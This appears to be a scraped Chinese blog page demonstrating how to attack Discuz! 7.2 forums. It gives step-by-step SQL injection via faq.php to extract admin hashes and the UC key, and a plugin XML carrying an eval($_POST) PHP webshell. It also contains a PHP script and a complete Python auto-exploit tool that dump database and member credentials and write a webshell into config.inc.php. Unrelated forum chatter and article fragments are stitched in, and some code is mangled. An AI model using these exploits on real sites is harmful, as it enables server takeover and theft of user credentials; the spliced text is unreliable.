Discuz!7.2漏洞利用过程演示
时间： 21:14:42
&&&& 阅读：480
&&&& 评论：
&&&& 收藏：0
标签：Discuz！7.2版本，这个版本是09年的平台了，现在已经是X版本了，不过里面的一些知识倒是到现在也还适用。
简述：利用Discuz！7.2的SQL注入漏洞爆出管理员用户密码后再利用xml检测漏洞上传一句话木马+菜刀getshell获得服务器控制权
实现过程：
首先，找到Discuz！版本为7.2的网站。
打开K8飞刀工具并选择Exploit下的Discuz！7.2项
选择faq.php 爆出管理员邮箱和加密后的管理员密码
再cmd5网站对加密数据串解密获得管理员明文密码登录Discuz！论坛
进入管理中心
密码与管理员密码相同
在本机构建一句话木马插件
文件命名为dz7.2.xml
使用代码：
&?xml version="1.0" encoding="ISO-8859-1"?&
&&&&&&& &item id="Title"&&![CDATA[Discuz! Plugin]]&&/item&
&&&&&&& &item id="Version"&&![CDATA[7.2]]&&/item&
&&&&&&& &item id="Time"&&![CDATA[ 15:57]]&&/item&
&&&&&&& &item id="From"&&![CDATA[Discuz! Board (/)&
]]&&/item&
&&&&&&& &item id="Data"&
&&&&&&&&&&&&&&& &item id="plugin"&
&&&&&&&&&&&&&&&&&&&&&&& &item id="available"&&![CDATA[0]]&&/item&
&&&&&&&&&&&&&&&&&&&&&&& &item id="adminid"&&![CDATA[0]]&&/item&
&&&&&&&&&&&&&&&&&&&&&&& &item id="name"&&![CDATA[wwwsite]]&&/item&
&&&&&&&&&&&&&&&&&&&&&&& &item id="identifier"&&![CDATA[shell]]&&/item&
&&&&&&&&&&&&&&&&&&&&&&& &item id="description"&&![CDATA[]]&&/item&
&&&&&&&&&&&&&&&&&&&&&&& &item id="datatables"&&![CDATA[]]&&/item&
&&&&&&&&&&&&&&&&&&&&&&& &item id="directory"&&![CDATA[]]&&/item&
&&&&&&&&&&&&&&&&&&&&&&& &item id="copyright"&&![CDATA[]]&&/item&
&&&&&&&&&&&&&&&& &&&&&&&&item id="modules"&&![CDATA[a:0:{}]]&&/item&
&&&&&&&&&&&&&&&&&&&&&&& &item id="version"&&![CDATA[]]&&/item&
&&&&&&&&&&&&&&& &/item&
&&&&&&&&&&&&&&& &item id="version"&&![CDATA[7.2]]&&/item&
&&&&&&&&&&&&&&& &item id="language"&
&&&&&&&&&&&&&&&& &&&&&&&&item id="scriptlang"&
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& &item id="a\"&&![CDATA[=&1);&
eval($_POST[cmd])?&]]&&/item&
&&&&&&&&&&&&&&&&&&&&&&& &/item&
&&&&&&&&&&&&&&& &/item&
&&&&&&& &/item&
进入后选择插件，选择木马文件，并勾选允许导入不同版本 Discuz! 的插件(易产生错误!!)复选框
点击提交后进入插件列表
勾选新出现的插件点击提交，如果不提交将无法getshell
点击勾选后，打开菜刀
编辑SHELL中
后面的文本框内容为：cmd
&T&MYSQL&/T&
&H&10.5.98.132&/H&
点击编辑完成
双击添加的shell条目
进入服务器
演示完毕！
&&国之画&&&& &&&&chrome插件&&
版权所有 京ICP备号-2
迷上了代码！查看: 6941|回复: 86
dz7.2版本成了绝唱？
dz7.2的最后一个单纯的论坛版本，相信很多网站都还在用着
并且一直期望官方能够延续7.2发行一个纯论坛版本的简洁版的程序
我只看到官方一直在开发x，可是x比较适合中大型网站，中小型网站一个7.2简洁版本的功能足以
不知道为什么官方不管7.2的手机版等等了。。。
我觉得如果放弃了7.2，对于dz来说是一个彻底围绕站长走，放弃了自己的开发原则，
学学苹果吧，程序简单实用，打开速度快，对于会员使用容易上手
不要老是围着站长转了，站长维护网站再简单，是容易引导大家都用dz程序
但是站长用dz程序做不起来网站，最终还是会放弃，或者改用其他程序。
吸引来人简单，留住人继续使用dz程序才是保持永久发展之计
一家之言，进攻参考
为了挣积分~~~
为了挣积分~~~
花开、相依 发表于
为了挣积分~~~
为了挣积分~~~
为了挣积分
neol123 发表于
为了挣积分
不是吧，都两个太阳还要积分？
urs2 发表于
不是吧，都两个太阳还要积分？
我学楼上的。
要站好队啊
为了挣积分
我怎么才这么点积分?
Powered by没完整取值只取了62位我们再取一次
faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,63,60) from cdb_uc_applications limit 0,1),0x3a)x from information_schema.tables group by x)a)%23
那么获取到的uc key就是d77978Sbq4b39bVccfK0J9B0K3x792ieH39dNbY8s8l79dB3z63fp2t563rdm6P4和shell里的对比下&0x03利用uc key getshellEXP：
$timestamp = time()+10*3600;
$uc_key="A1v8Z5Z7feZdmfcd72J5C5V8hc8dM4F6V2g0h5ofXdS6jcm1C78bZede39z51610";
$code=urlencode(_authcode("time=$timestamp&action=updateapps", 'ENCODE', $uc_key));
$cmd1='&?xml version="1.0" encoding="ISO-8859-1"?&
&item id="UC_API"&xxx\');eval($_POST[cmd]);//&/item&
$cmd2='&?xml version="1.0" encoding="ISO-8859-1"?&
&item id="UC_API"&aaa&/item&
$html1 = send($cmd1);
echo $html1;
$html2 = send($cmd2);
echo $html2;
&function send($cmd){
global $host,$
$message = "POST /api/uc.php?code=".$code."
HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Referer: ".$host."\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: Mozilla/4.0 ( MSIE 6.00; Windows NT 5.1; SV1)\r\n";
$message .= "Host: ".$host."\r\n";
$message .= "Content-Length: ".strlen($cmd)."\r\n";
$message .= "Connection: Close\r\n\r\n";
$message .= $
$fp = fsockopen($host, 80);
fputs($fp, $message);
$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
&function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
$ckey_length = 4;
$key = md5($key ? $key : UC_KEY);
$keya = md5(substr($key, 0, 16));
$keyb = md5(substr($key, 16, 16));
$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
$cryptkey = $keya.md5($keya.$keyc);
$key_length = strlen($cryptkey);
$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$
$string_length = strlen($string);
$result = '';
$box = range(0, 255);
$rndkey = array();
for($i = 0; $i &= 255; $i++) {
$rndkey[$i] = ord($cryptkey[$i % $key_length]);
for($j = $i = 0; $i & 256; $i++) {
$j = ($j + $box[$i] + $rndkey[$i]) % 256;
$tmp = $box[$i];
$box[$i] = $box[$j];
$box[$j] = $
for($a = $j = $i = 0; $i & $string_ $i++) {
$a = ($a + 1) % 256;
$j = ($j + $box[$a]) % 256;
$tmp = $box[$a];
$box[$a] = $box[$j];
$box[$j] = $
$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
if($operation == 'DECODE') {
if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() & 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
return substr($result, 26);
return '';
return $keyc.str_replace('=', '', base64_encode($result));
$host="";$uc_key="xxx"
放在php.exe的环境里直接 getshell
成功会显示
0x04一句话地址一句话的地址是http://xxxx.tw/config.inc.php 密码cmdenjoy it！
ps:上面获取shell的步骤有点麻烦，首先要通过注入语句获取uc_key，然后利用uc_key获取webshell。下面的代码可以自动完成上面步骤来获取webshell。
Python Discuz 7.2 faq.php sql注入漏洞全自动利用工具
#!/usr/bin/env python
# -*- coding: gbk -*-
# -*- coding: utf_8 -*-
# author iswin
import sys
import hashlib
import time
import math
import base64
import urllib2
import urllib
&def sendRequest(url,para):
data = urllib.urlencode(para)
req=urllib2.Request(url,data)
res=urllib2.urlopen(req,timeout=20).read()
except Exception, e:
print 'Exploit Failed!\n%s'%(e)
return res
&def getTablePrefix(url):
print 'Start GetTablePrefix...'
para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select hex(TABLE_NAME) from INFORMATION_SCHEMA.TABLES where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}
res=sendRequest(url,para);
pre=re.findall("Duplicate entry '(.*?)'",res);
if len(pre)==0:
print 'Exploit Failed!'
table_pre=pre[0][:len(pre[0])-1].decode('hex')
table_pre=table_pre[0:table_pre.index('_')]
print 'Table_pre:%s'%(table_pre)
return table_pre
&def getCurrentUser(url):
para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}
res=sendRequest(url,para)
pre=re.findall("Duplicate entry '(.*?)'",res)
if len(pre)==0:
print 'Exploit Failed!'
table_pre=pre[0][:len(pre[0])-1]
print 'Current User:%s'%(table_pre)
return table_pre
&def getUcKey(url):
para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select substr(authkey,1,62) from cdb_uc_applications limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}
para1={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select substr(authkey,63,2) from cdb_uc_applications limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}
res=sendRequest(url,para);
res1=sendRequest(url,para1);
key1=re.findall("Duplicate entry '(.*?)'",res)
key2=re.findall("Duplicate entry '(.*?)'",res1)
if len(key1)==0:
print 'Get Uc_Key Failed!'
key=key1[0][:len(key1[0])-1]+key2[0][:len(key2[0])-1]
print 'uc_key:%s'%(key)
return key
&def getRootUser(url):
para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select concat(user,0x20,password) from mysql.user limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'}
res=sendRequest(url,para);
pre=re.findall("Duplicate entry '(.*?)'",res)
if len(pre)==0:
print 'Exploit Failed!'
table_pre=pre[0][:len(pre[0])-1].split(' ')
print 'root info:\nuser:%s password:%s'%(table_pre[0],table_pre[1])
&def dumpData(url,table_prefix,count):
para={'action':'grouppermission','gids[99]':'\'','gids[100][0]':') and (select 1 from (select count(*),concat((select concat(username,0x20,password) from %s_members limit %d,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'%(table_prefix,count)}
res=sendRequest(url,para);
datas=re.findall("Duplicate entry '(.*?)'",res)
if len(datas)==0:
print 'Exploit Failed!'
cleandata=datas[0][:len(datas[0])-1]
info=cleandata.split(' ')
print 'user:%s pass:%s'%(info[0],info[1])
&def microtime(get_as_float = False) :
if get_as_float:
return time.time()
return '%.8f %d' % math.modf(time.time())
&def get_authcode(string, key = ''):
ckey_length = 4
key = hashlib.md5(key).hexdigest()
keya = hashlib.md5(key[0:16]).hexdigest()
keyb = hashlib.md5(key[16:32]).hexdigest()
keyc = (hashlib.md5(microtime()).hexdigest())[-ckey_length:]
cryptkey = keya + hashlib.md5(keya+keyc).hexdigest()
key_length = len(cryptkey)
string = '' + (hashlib.md5(string+keyb)).hexdigest()[0:16]+string
string_length = len(string)
result = ''
box = range(0, 256)
rndkey = dict()
for i in range(0,256):
rndkey[i] = ord(cryptkey[i % key_length])
for i in range(0,256):
j = (j + box[i] + rndkey[i]) % 256
tmp = box[i]
box[i] = box[j]
box[j] = tmp
for i in range(0,string_length):
a = (a + 1) % 256
j = (j + box[a]) % 256
tmp = box[a]
box[a] = box[j]
box[j] = tmp
result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256]))
return keyc + base64.b64encode(result).replace('=', '')
&def get_shell(url,key,host):
headers={'Accept-Language':'zh-cn',
'Content-Type':'application/x-www-form-urlencoded',
'User-Agent':'Mozilla/4.0 ( MSIE 6.00; Windows NT 5.1; SV1)',
'Referer':url
tm = time.time()+10*3600
tm="time=%d&action=updateapps" %tm
code = urllib.quote(get_authcode(tm,key))
url=url+"?code="+code
data1='''&?xml version="1.0" encoding="ISO-8859-1"?&
&item id="UC_API"&http://xxx\');eval($_POST[3]);//&/item&
&/root&'''
req=urllib2.Request(url,data=data1,headers=headers)
ret=urllib2.urlopen(req)
return "Exploit Falied"
data2='''&?xml version="1.0" encoding="ISO-8859-1"?&
&item id="UC_API"&http://aaa&/item&
&/root&'''
req=urllib2.Request(url,data=data2,headers=headers)
ret=urllib2.urlopen(req)
return "error"
req=urllib2.Request(host+'/config.inc.php')
res=urllib2.urlopen(req,timeout=20).read()
except Exception, e:
print 'GetWebshell Failed,%s'%(e)
print "webshell:"+host+"/config.inc.php,password:3"
&if __name__ == '__main__':
print 'DZ7.x Exp Code By iswin'
if len(sys.argv)&3:
print 'DZ7.x Exp Code By iswin\nusage:python dz7.py http://www.iswin.org 10'
url=sys.argv[1]+'/faq.php'
count=int(sys.argv[2])
user=getCurrentUser(url)
if user.startswith('root@'):
getRootUser(url)
uc_key=getUcKey(url)
if len(uc_key)==64:
print 'Start GetWebshell...'
get_shell(sys.argv[1]+'/api/uc.php',uc_key,sys.argv[1])
tb_pre=getTablePrefix(url)
print 'Start DumpData...'
for x in xrange(0,count):
dumpData(url,tb_pre,x)
本文已收录于以下专栏：
相关文章推荐
// 代码版权归原作者所有！
$timestamp = time()+10*3600;
$host=&127.0.0.1&;
$uc_key=&eapf15K8b3...
Discuz的利用UC_KEY进行getshell
　　// 代码版权归原作者所有!
　　$timestamp = time()+10*3600;
　　$host=&127.0.0.1...
6.2号（可能更早）看到网上这个exp，是一个discuz 7.2的sql注射漏洞
经过多番考证，网上多数exp中都存在这些或者那些的问题，我自己利用和修改后总结，利用方法如下：
 Discuz ...
今天碰到一个dz的站，好久没拿了 ，拿下shell觉得应该总结一下
Uc_server默认密码
其实有了UC_SERVER就是有了网站的全部权限了，有了UC_SERVER你可以重置管理员密码
可以进后...
0、linux常用路径及说明：
   /dev/null   回收站
1、more命令和cat的功能一样都是查看文件里的内容，但有所不同的是more可以按页来查看文件的内容，还支持直接跳转...
====================================
Discuz! 7.2 升级至 Discuz! X2.0 说明
=============================...
不了解该漏洞建议先看这个文章
Redis 未授权访问配合 SSH key 文件利用分析漏洞利用流程1 生成一对用于ssh验证的密钥对
2 通过redis未授权访问漏洞,向redis插入一条记录,内...
他的最新文章
讲师：刘文志
讲师：陈伟
您举报文章：
举报原因：
原文地址：
原因补充：
(最多只允许输入30个字)